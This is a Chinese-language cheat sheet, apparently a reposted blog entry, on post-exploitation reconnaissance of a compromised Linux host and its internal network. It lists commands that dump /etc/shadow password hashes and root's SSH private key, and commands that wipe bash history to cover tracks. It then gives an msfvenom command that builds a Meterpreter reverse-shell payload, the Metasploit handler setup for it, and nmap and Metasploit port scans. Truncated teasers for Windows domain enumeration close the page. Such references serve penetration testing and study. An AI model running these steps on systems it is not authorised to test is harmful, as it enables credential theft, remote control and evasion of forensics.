Linux 內網本機資訊收集速查

2021-10-07 10:45:21 字數 1941 閱讀 2771

linux 內網本機資訊收集速查

系統型別

cat /etc/issue

檢視系統名稱

核心版本
uname –a 檢視所有資訊
使用者
whoami

idcat /etc/passwd #檢視使用者列表

cat /etc/shadow #獲取使用者hash

程序
ps aux 檢視程序資訊
網絡卡
/etc/network/inte***ces #網絡卡資訊

ifconfig

route #檢視路由

arp -a #檢視快取的位址解析情況

服務資訊
cat /etc/serivice #檢視存在的服務

cat /etc/serices | grep ** #檢視對應服務

服務配置
cat /etc/apache2/apache2.conf

cat /etc/my.conf

cat /etc/httpd/conf/httpd.conf

日誌資訊
/var/log

/var/log/apache2/access.log #http日誌

/var/log/mysql/error.log #mysql日誌

/var/log/apt/history.log #apt日誌

歷史命令
~/.bash_history

echo > .bash_history #上述檔案類日誌刪除

history #命令操作歷史

history -c #刪除

軟體資訊
dpkg -l #檢視安裝的軟體包

rpm -qa #檢視安裝的軟體包

歷史命令!

/root/.bash_history
本地儲存的ssh金鑰

/root/.ssh/id_rsa
1.示例指令:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.73.131 lport=4444 -f elf > root/desktop/shell
2.配置metasploitexploit監聽

search exploit/hanler  // (exploit/multi/handler:通用有效負載處理程式)

use exploit/multi/handler // 使用模組

show options // 配置

set lhost 192.168.73.131

set payload linux/x86/meterpreter/reverse_tcp // 設定測試的載荷

exploit // 監聽

nmap掃瞄:

nmap ‐sp ‐pi 192.168.1.0/24 ‐t4
埠掃瞄

auxiliary/scanner/portscan

scanner/portscan/ack ack防火牆掃瞄

scanner/portscan/ftpbounce ftp跳埠掃瞄

scanner/portscan/syn syn埠掃瞄

scanner/portscan/tcp tcp埠掃瞄

scanner/portscan/xmas tcp"xmas"埠掃瞄

smb掃瞄

scanner下模組,輔助發現內網存活主機,分別為:

內網資訊收集

1 資訊收集 a.獲取當前組的計算機名 net viewb.檢視所有域 net view domainc.從計算機名獲取ipv4位址 ping n 1 計算機名 4 ps 如果計算機名很多時,可以利用bat批量ping獲取ip bat echo off setlocal enabledelayede...

內網資訊收集

主機資訊收集關鍵點 人員資訊收集關鍵點 人員口令密碼 ftp vnc mysql ssh mail等 人員角色 運維開發領導財務人力普通員工等 郵箱關聯關係 瀏覽器訪問記錄和密碼資訊 鍵盤記錄 rdp記錄 ssh記錄 最近開啟檔案 桌面檔案 電腦中的辦公檔案 doc xls pdf等 網路資訊收集關...

內網資訊收集命令

net user domain 檢視域使用者 net view domain 檢視有幾個域 net view domain 檢視域內的主機 net group domain 檢視域裡面的組 net group domain computer domain 檢視域內所有的主機名 net group d...